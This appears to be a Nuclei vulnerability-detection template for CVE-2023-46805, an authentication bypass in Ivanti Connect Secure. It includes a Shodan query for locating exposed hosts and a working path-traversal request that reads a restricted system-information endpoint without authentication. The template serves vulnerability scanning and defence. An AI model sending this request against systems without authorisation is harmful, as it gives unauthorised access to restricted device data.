47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2023-46805
|
|
|
|
info:
|
|
name: Ivanti ICS - Authentication Bypass
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
|
|
reference:
|
|
- https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-46805
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
|
|
cvss-score: 8.2
|
|
cve-id: CVE-2023-46805
|
|
cwe-id: CWE-287
|
|
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
vendor: ivanti
|
|
product: "connect_secure"
|
|
shodan-query: "html:\"welcome.cgi?p=logo\""
|
|
max-request: 1
|
|
tags: cve,cve2023,kev,auth-bypass,ivanti
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"build":'
|
|
- '"system-information":'
|
|
- '"software-inventory":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100d947628480b95c4b524346aa3ef047add5b4f09552a973b4bef1509c6f8a2c220221008cc2764556845c0f3002a89650e49126cde7e259fa0de8339d296cb4ffc637d1:922c64590222798bb761d5b6d8e72950 |